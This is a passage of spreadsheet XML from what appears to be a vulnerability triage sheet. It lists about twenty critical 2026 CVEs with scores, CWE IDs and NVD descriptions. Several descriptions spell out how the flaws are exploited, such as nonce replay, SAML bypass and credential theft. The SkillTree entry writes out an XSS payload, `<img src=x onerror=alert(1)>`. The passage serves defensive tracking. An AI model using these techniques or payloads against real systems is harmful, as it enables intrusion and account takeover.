          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85509</t>
        </is>
      </c>
    </row>
    <row r="285">
      <c r="A285" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B285" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86219</t>
        </is>
      </c>
      <c r="C285" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D285" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E285" s="5" t="inlineStr"/>
      <c r="F285" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G285" s="5" t="inlineStr"/>
      <c r="H285" s="5" t="inlineStr"/>
      <c r="I285" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="J285" s="5" t="inlineStr"/>
      <c r="K285" s="5" t="inlineStr">
        <is>
          <t>CWE-294</t>
        </is>
      </c>
      <c r="L285" s="5" t="inlineStr">
        <is>
          <t>Authen::SASL::Perl::DIGEST_MD5 versions before 2.2100 for Perl accept replayed authentication responses via unverified nonce in server_step.
server_start generates a fresh nonce and sends it in the challenge, and nothing later compares that value against the nonce the client returns. server_step derives the expected digest from the client's own parameters, so a response verifies whenever its digest matches the nonce it carries. The count table it also checks is keyed on the client-supplied nonce and starts empty in each new server object, so a captured first response, carrying `nc=00000001`, passes that too. RFC 2831 defines the nonce in the response as the value the server sent in the preceding challenge.
An attacker who observes one successful `qop=auth` exchange can replay the captured response against a later session for the same service, host, realm and user, and authenticate as that user without knowing the password.</t>
        </is>
      </c>
      <c r="M285" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86219</t>
        </is>
      </c>
    </row>
    <row r="286">
      <c r="A286" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B286" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86304</t>
        </is>
      </c>
      <c r="C286" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D286" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E286" s="5" t="inlineStr"/>
      <c r="F286" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G286" s="5" t="inlineStr"/>
      <c r="H286" s="5" t="inlineStr"/>
      <c r="I286" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="J286" s="5" t="inlineStr"/>
      <c r="K286" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="L286" s="5" t="inlineStr">
        <is>
          <t>MojoX::Authentication versions before 0.006 for Perl allow SAML authentication bypass because parse_assertion builds Net::SAML2::Binding::POST without a trust anchor.
parse_assertion in MojoX::Authentication::Model::SAML2 calls Net::SAML2::Binding::POST-&gt;new with no cacert, cert_text or anchors argument, then passes the returned XML to Net::SAML2::Protocol::Assertion-&gt;new_from_xml with the IdP signing certificate as cacert. In Net::SAML2 before 0.86 that certificate guards only encrypted assertions, so the signature on an unencrypted assertion is checked against the certificate the response itself carries.
An attacker starts a SAML login, then posts a response signed with a certificate of their own. The audience, InResponseTo and timestamp checks that follow are all satisfiable by the attacker, so the response authenticates any NameID it carries.</t>
        </is>
      </c>
      <c r="M286" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86304</t>
        </is>
      </c>
    </row>
    <row r="287">
      <c r="A287" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B287" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86478</t>
        </is>
      </c>
      <c r="C287" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D287" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E287" s="5" t="inlineStr"/>
      <c r="F287" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G287" s="5" t="inlineStr"/>
      <c r="H287" s="5" t="inlineStr"/>
      <c r="I287" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J287" s="5" t="inlineStr"/>
      <c r="K287" s="5" t="inlineStr">
        <is>
          <t>CWE-290</t>
        </is>
      </c>
      <c r="L287" s="5" t="inlineStr">
        <is>
          <t>In JetBrains YouTrack before 2025.3.161254, 
2026.1.14042 improper authentication in YouTrack Helpdesk allowed unauthenticated account takeover via a self-asserted email address</t>
        </is>
      </c>
      <c r="M287" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86478</t>
        </is>
      </c>
    </row>
    <row r="288">
      <c r="A288" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B288" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86480</t>
        </is>
      </c>
      <c r="C288" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D288" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E288" s="5" t="inlineStr"/>
      <c r="F288" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G288" s="5" t="inlineStr"/>
      <c r="H288" s="5" t="inlineStr"/>
      <c r="I288" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J288" s="5" t="inlineStr"/>
      <c r="K288" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L288" s="5" t="inlineStr">
        <is>
          <t>In JetBrains Hub before 2026.2.52442 an unauthenticated attacker could register a trusted service and gain superuser privileges</t>
        </is>
      </c>
      <c r="M288" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86480</t>
        </is>
      </c>
    </row>
    <row r="289">
      <c r="A289" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B289" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87534</t>
        </is>
      </c>
      <c r="C289" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D289" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E289" s="5" t="inlineStr"/>
      <c r="F289" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G289" s="5" t="inlineStr"/>
      <c r="H289" s="5" t="inlineStr">
        <is>
          <t>google:android, google:chrome</t>
        </is>
      </c>
      <c r="I289" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J289" s="5" t="inlineStr"/>
      <c r="K289" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L289" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in WebView in Google Chrome on on Android prior to 153.0.8010.36 allowed a remote attacker leveraging social engineering to bypass system access restrictions via crafted network traffic. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="M289" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87534</t>
        </is>
      </c>
    </row>
    <row r="290">
      <c r="A290" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B290" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87544</t>
        </is>
      </c>
      <c r="C290" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D290" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E290" s="5" t="inlineStr"/>
      <c r="F290" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G290" s="5" t="inlineStr"/>
      <c r="H290" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="I290" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J290" s="5" t="inlineStr"/>
      <c r="K290" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L290" s="5" t="inlineStr">
        <is>
          <t>Incorrect authorization in Extensions in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to bypass system access restrictions into a privileged page via a crafted HTML page. (Chromium security severity: Low)</t>
        </is>
      </c>
      <c r="M290" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87544</t>
        </is>
      </c>
    </row>
    <row r="291">
      <c r="A291" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B291" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-8778</t>
        </is>
      </c>
      <c r="C291" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D291" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E291" s="5" t="inlineStr"/>
      <c r="F291" s="5" t="inlineStr"/>
      <c r="G291" s="5" t="inlineStr"/>
      <c r="H291" s="5" t="inlineStr"/>
      <c r="I291" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J291" s="5" t="inlineStr"/>
      <c r="K291" s="5" t="inlineStr">
        <is>
          <t>CWE-434</t>
        </is>
      </c>
      <c r="L291" s="5" t="inlineStr">
        <is>
          <t>The MIPL Grouped Checkout Fields for WooCommerce – Customize &amp; Organize Checkout Fields. plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the `mipl_wc_upload_file` function in all versions up to, and including, 1.2.1. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.</t>
        </is>
      </c>
      <c r="M291" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-8778</t>
        </is>
      </c>
    </row>
    <row r="292">
      <c r="A292" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B292" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88018</t>
        </is>
      </c>
      <c r="C292" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D292" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E292" s="5" t="inlineStr"/>
      <c r="F292" s="5" t="inlineStr"/>
      <c r="G292" s="5" t="inlineStr"/>
      <c r="H292" s="5" t="inlineStr"/>
      <c r="I292" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J292" s="5" t="inlineStr"/>
      <c r="K292" s="5" t="inlineStr">
        <is>
          <t>CWE-287, CWE-306</t>
        </is>
      </c>
      <c r="L292" s="5" t="inlineStr">
        <is>
          <t>rclone is a command-line program to sync files and directories to and from different cloud storage providers. Prior to 1.75.1, rclone serve s3 configured with --auth-proxy but without --auth-key allows authPairMiddleware to register any client-chosen accessKeyID with an empty ws.s3Secret. gofakes3 then verifies the request’s SigV4 signature against that same empty secret, while Server.auth passes the access key identifier as both the user and authentication value to the proxy without an independent per-identity secret. An unauthenticated network attacker can therefore choose an arbitrary access key, sign with an empty secret, and reach whatever backend the auth-proxy script resolves for that identity. This issue is fixed in version 1.75.1.</t>
        </is>
      </c>
      <c r="M292" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88018</t>
        </is>
      </c>
    </row>
    <row r="293">
      <c r="A293" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B293" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88278</t>
        </is>
      </c>
      <c r="C293" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D293" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E293" s="5" t="inlineStr"/>
      <c r="F293" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G293" s="5" t="inlineStr"/>
      <c r="H293" s="5" t="inlineStr"/>
      <c r="I293" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J293" s="5" t="inlineStr"/>
      <c r="K293" s="5" t="inlineStr">
        <is>
          <t>CWE-294</t>
        </is>
      </c>
      <c r="L293" s="5" t="inlineStr">
        <is>
          <t>GeoVision GV-LPC2211 V1.13 fails to enforce WS-Security UsernameToken freshness or nonce reuse protection, allowing a captured PasswordDigest token to be replayed for subsequent ONVIF operations.</t>
        </is>
      </c>
      <c r="M293" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88278</t>
        </is>
      </c>
    </row>
    <row r="294">
      <c r="A294" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B294" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-9163</t>
        </is>
      </c>
      <c r="C294" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="D294" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E294" s="5" t="inlineStr"/>
      <c r="F294" s="5" t="inlineStr"/>
      <c r="G294" s="5" t="inlineStr"/>
      <c r="H294" s="5" t="inlineStr"/>
      <c r="I294" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J294" s="5" t="inlineStr"/>
      <c r="K294" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L294" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of special elements used in an SQL command ('SQL injection') vulnerability in GIS Informatics GisLab Laboratory Management System allows SQL Injection.
This issue affects GisLab Laboratory Management System: from 1.4.03 before 1.5.</t>
        </is>
      </c>
      <c r="M294" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-9163</t>
        </is>
      </c>
    </row>
    <row r="295">
      <c r="A295" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B295" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19274</t>
        </is>
      </c>
      <c r="C295" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="D295" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E295" s="5" t="inlineStr"/>
      <c r="F295" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G295" s="5" t="inlineStr">
        <is>
          <t>ibm, kubernetes</t>
        </is>
      </c>
      <c r="H295" s="5" t="inlineStr"/>
      <c r="I295" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J295" s="5" t="inlineStr"/>
      <c r="K295" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="L295" s="5" t="inlineStr">
        <is>
          <t>IBM Observability with Instana (Agent) Build 1.0.303 through 1.0.323 IBM Instana Agent Operator could allow an authenticated Kubernetes tenant to hijack or permanently destroy another tenant's cluster-level RBAC permissions, caused by cluster-scoped RBAC objects being keyed solely by the bare CR name with no namespace disambiguation, allowing a same-named `InstanaAgent` CR in an attacker-controlled namespace to silently overwrite the shared `ClusterRoleBinding` or delete it outright and revoke the victim agent's cluster monitoring access.</t>
        </is>
      </c>
      <c r="M295" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19274</t>
        </is>
      </c>
    </row>
    <row r="296">
      <c r="A296" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B296" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-39821</t>
        </is>
      </c>
      <c r="C296" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="D296" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E296" s="5" t="inlineStr"/>
      <c r="F296" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G296" s="5" t="inlineStr"/>
      <c r="H296" s="5" t="inlineStr">
        <is>
          <t>golang:net</t>
        </is>
      </c>
      <c r="I296" s="5" t="inlineStr">
        <is>
          <t>2026-05-22</t>
        </is>
      </c>
      <c r="J296" s="5" t="inlineStr"/>
      <c r="K296" s="5" t="inlineStr">
        <is>
          <t>CWE-1289</t>
        </is>
      </c>
      <c r="L296" s="5" t="inlineStr">
        <is>
          <t>The ToASCII and ToUnicode functions incorrectly accept Punycode-encoded labels that decode to an ASCII-only label. For example, ToUnicode("xn--example-.com") incorrectly returns the name "example.com" rather than an error. This behavior can lead to privilege escalation in programs using the idna package. For example, a program which performs privilege checks on the ASCII hostname may reject "example.com" but permit "xn--example-.com". If that program subsequently converts the ASCII hostname to Unicode, it will inadvertently permits access to the Unicode name "example.com".</t>
        </is>
      </c>
      <c r="M296" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-39821</t>
        </is>
      </c>
    </row>
    <row r="297">
      <c r="A297" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B297" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47705</t>
        </is>
      </c>
      <c r="C297" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="D297" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E297" s="5" t="inlineStr"/>
      <c r="F297" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G297" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H297" s="5" t="inlineStr"/>
      <c r="I297" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J297" s="5" t="inlineStr"/>
      <c r="K297" s="5" t="inlineStr">
        <is>
          <t>CWE-1236</t>
        </is>
      </c>
      <c r="L297" s="5" t="inlineStr">
        <is>
          <t>TypeBot is a chatbot builder tool. Version 3.16.1 has a CSV injection vulnerability in the result export functionality. The application does not sanitize or escape user-supplied input when generating CSV files. An attacker can inject spreadsheet formulas into input fields, which are later executed when an administrator opens the exported CSV in spreadsheet software such as Microsoft Excel or LibreOffice Calc. Version 3.17.0 patches the issue.</t>
        </is>
      </c>
      <c r="M297" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-47705</t>
        </is>
      </c>
    </row>
    <row r="298">
      <c r="A298" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B298" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-50540</t>
        </is>
      </c>
      <c r="C298" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="D298" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E298" s="5" t="inlineStr"/>
      <c r="F298" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G298" s="5" t="inlineStr"/>
      <c r="H298" s="5" t="inlineStr"/>
      <c r="I298" s="5" t="inlineStr">
        <is>
          <t>2026-08-07</t>
        </is>
      </c>
      <c r="J298" s="5" t="inlineStr"/>
      <c r="K298" s="5" t="inlineStr">
        <is>
          <t>CWE-20, CWE-22</t>
        </is>
      </c>
      <c r="L298" s="5" t="inlineStr">
        <is>
          <t>Kata Containers is an open source project focusing on a standard implementation of lightweight Virtual Machines (VMs) that perform like containers. Prior to version 4.0.0, kata-runtime is vulnerable to host code execution via an unvalidated configuration path annotation. The runtime accepts an arbitrary io.katacontainers.config_path pod annotation and loads the referenced host TOML file without restriction. As a result, a pod user who can place a file at a host-visible path can supply a configuration that selects an attacker-controlled hypervisor or virtio-fs daemon binary, executing code as root on the host. This issue is fixed in version 4.0.0.</t>
        </is>
      </c>
      <c r="M298" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-50540</t>
        </is>
      </c>
    </row>
    <row r="299">
      <c r="A299" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B299" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53546</t>
        </is>
      </c>
      <c r="C299" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="D299" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E299" s="5" t="inlineStr"/>
      <c r="F299" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G299" s="5" t="inlineStr"/>
      <c r="H299" s="5" t="inlineStr"/>
      <c r="I299" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J299" s="5" t="inlineStr"/>
      <c r="K299" s="5" t="inlineStr">
        <is>
          <t>CWE-639, CWE-862</t>
        </is>
      </c>
      <c r="L299" s="5" t="inlineStr">
        <is>
          <t>Termix is a web-based server management platform with SSH terminal, tunneling, and file editing capabilities. Prior to 2.3.2, the terminal WebSocket accepts a user-controlled hostConfig.id and src/backend/ssh/host-resolver.ts resolves that host without requiring ownership or explicit access. When no credential is shared with the requester, resolveHostById performs an owner credential fallback, and src/backend/ssh/terminal.ts combines that credential with attacker-controlled ip, port, and username values. An authenticated low-privileged user can therefore make Termix authenticate to an attacker-controlled SSH server and disclose another user's stored SSH password or private-key material while the victim user's data key is unlocked. This issue is fixed in version 2.3.2.</t>
        </is>
      </c>
      <c r="M299" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53546</t>
        </is>
      </c>
    </row>
    <row r="300">
      <c r="A300" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B300" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53548</t>
        </is>
      </c>
      <c r="C300" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="D300" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E300" s="5" t="inlineStr"/>
      <c r="F300" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G300" s="5" t="inlineStr"/>
      <c r="H300" s="5" t="inlineStr"/>
      <c r="I300" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J300" s="5" t="inlineStr"/>
      <c r="K300" s="5" t="inlineStr">
        <is>
          <t>CWE-285, CWE-639</t>
        </is>
      </c>
      <c r="L300" s="5" t="inlineStr">
        <is>
          <t>Termix is a web-based server management platform with SSH terminal, tunneling, and file editing capabilities. Prior to 2.6.1, the GET /host/db/host/:id/password endpoint in src/backend/database/routes/host.ts accepts an authenticated user's numeric host ID and the field=password or field=sudoPassword query without enforcing host ownership during credential resolution. A failed requester-scoped lookup can resolve the host with the owner's context and return the owner's plaintext credential, allowing any authenticated user with a valid JWT to enumerate sequential hosts.id values and retrieve SSH or sudo passwords belonging to other users. The disclosed credentials can then be used to access and control managed systems outside the Termix instance. This issue is fixed in version 2.6.1.</t>
        </is>
      </c>
      <c r="M300" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53548</t>
        </is>
      </c>
    </row>
    <row r="301">
      <c r="A301" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B301" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53552</t>
        </is>
      </c>
      <c r="C301" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="D301" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E301" s="5" t="inlineStr"/>
      <c r="F301" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G301" s="5" t="inlineStr"/>
      <c r="H301" s="5" t="inlineStr"/>
      <c r="I301" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="J301" s="5" t="inlineStr"/>
      <c r="K301" s="5" t="inlineStr">
        <is>
          <t>CWE-639, CWE-863</t>
        </is>
      </c>
      <c r="L301" s="5" t="inlineStr">
        <is>
          <t>Goploy is an open-source automation deployment system. In versions 1.17.5 and prior, Project.AddFile, Project.EditFile, Project.RemoveFile, and Project.Edit in cmd/server/api/project/handler.go accept a project or project-file row id from the JSON body and act on it without checking that the project belongs to the caller's namespace. The corresponding model.ProjectFile.GetData and model.Project.GetData queries filter only by row id. A user holding the manager role (or any role that includes the FileSync / EditProject permission) in their own namespace can read, write, or delete files in any project across the install, and can rewrite any project's git remote URL by submitting the foreign id in the body. The git-URL primitive escalates to RCE on the next deploy because Edit runs git remote set-url on the project's working tree. At time of publication, there are no known publicly available patches.</t>
        </is>
      </c>
      <c r="M301" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53552</t>
        </is>
      </c>
    </row>
    <row r="302">
      <c r="A302" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B302" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53649</t>
        </is>
      </c>
      <c r="C302" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="D302" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E302" s="5" t="inlineStr"/>
      <c r="F302" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G302" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H302" s="5" t="inlineStr"/>
      <c r="I302" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="J302" s="5" t="inlineStr"/>
      <c r="K302" s="5" t="inlineStr">
        <is>
          <t>CWE-306, CWE-352, CWE-434, CWE-942</t>
        </is>
      </c>
      <c r="L302" s="5" t="inlineStr">
        <is>
          <t>Joro is a web exploitation framework. Prior to version 1.1.1, Joro's default proxy mode exposes a local API on 127.0.0.1:9090 that performs no authentication and applies a wildcard CORS policy. Because plugin uploads use the CORS-safelisted multipart/form-data content type, cross-origin JavaScript on any page the operator visits can reach privileged endpoints - including uploading a native plugin and triggering a restart - directly through the operator's browser, with no preflight or credentials. Since plugins execute on load, this yields unauthenticated remote code execution as the operator's user from a single page visit. This issue has been patched in version 1.1.1.</t>
        </is>
      </c>
      <c r="M302" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53649</t>
        </is>
      </c>
    </row>
    <row r="303">
      <c r="A303" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B303" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54523</t>
        </is>
      </c>
      <c r="C303" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="D303" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E303" s="5" t="inlineStr"/>
      <c r="F303" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G303" s="5" t="inlineStr"/>
      <c r="H303" s="5" t="inlineStr"/>
      <c r="I303" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="J303" s="5" t="inlineStr"/>
      <c r="K303" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L303" s="5" t="inlineStr">
        <is>
          <t>Kyverno is a policy engine designed for cloud native platform engineering teams. From 1.18.0 until 1.18.2, the NamespacedMutatingPolicy CEL compiler exposes the generator library to matchConditions, allowing a namespace-scoped policy to invoke generator.apply(namespace, resources) with an arbitrary target namespace. The validation in pkg/cel/policies/mpol/validate.go checks that the policy compiles but does not enforce namespace scope, and GenerateResources in pkg/cel/libs/context.go does not reject the cross-namespace target. A user who can create NamespacedMutatingPolicy objects in one namespace can cause the admission controller, operating with cluster-wide privileges, to create ConfigMaps, NetworkPolicies, Secrets, RoleBindings, and other resources in another namespace, enabling unauthorized modification and potential privilege escalation. This issue is fixed in version 1.18.2.</t>
        </is>
      </c>
      <c r="M303" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-54523</t>
        </is>
      </c>
    </row>
    <row r="304">
      <c r="A304" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B304" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-54694</t>
        </is>
      </c>
      <c r="C304" s="5" t="n">
        <v>9.6</v>
      </c>
      <c r="D304" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="E304" s="5" t="inlineStr"/>
      <c r="F304" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G304" s="5" t="inlineStr">
        <is>
          <t>java, aws</t>
        </is>
      </c>
      <c r="H304" s="5" t="inlineStr"/>
      <c r="I304" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J304" s="5" t="inlineStr"/>
      <c r="K304" s="5" t="inlineStr">
        <is>
          <t>CWE-116, CWE-183, CWE-20, CWE-693, CWE-79</t>
        </is>
      </c>
      <c r="L304" s="5" t="inlineStr">
        <is>
          <t>SkillTree is a micro-learning gamification platform. Prior to version 4.4.2, two independent code flaws combine into a single exploitable attack chain, with three distinct exploitation paths of escalating impact. `StringHighlighter.js` builds an HTML string by interpolating raw `value` substrings directly into a template literal with no HTML entity encoding. `HighlightedValue.vue` renders that string — and all unfiltered plain values — via Vue's `v-html` directive, which sets `innerHTML`. Separately, the account registration endpoint accepts `firstName`, `lastName`, and `nickname` fields and stores them without any HTML sanitization. An attacker self-registers with `firstName = "&lt;img src=x onerror=alert(1)&gt;"` (28 characters — within the 30-character field limit) and visits any quiz. The next time an administrator opens the Quiz Runs page the payload executes in their browser. Three attack paths exist with escalating impact. The first is basic cross-site scripting. Any self-contained payload fitting the 30-character limit (e.g. `&lt;img src=x onerror=alert(1)&gt;`, which is 28 chars) fires automatically when the admin navigates to the runs page through normal use. Arbitrary code execution in the admin's browser is confirmed with zero extra steps. The second is remote script loading 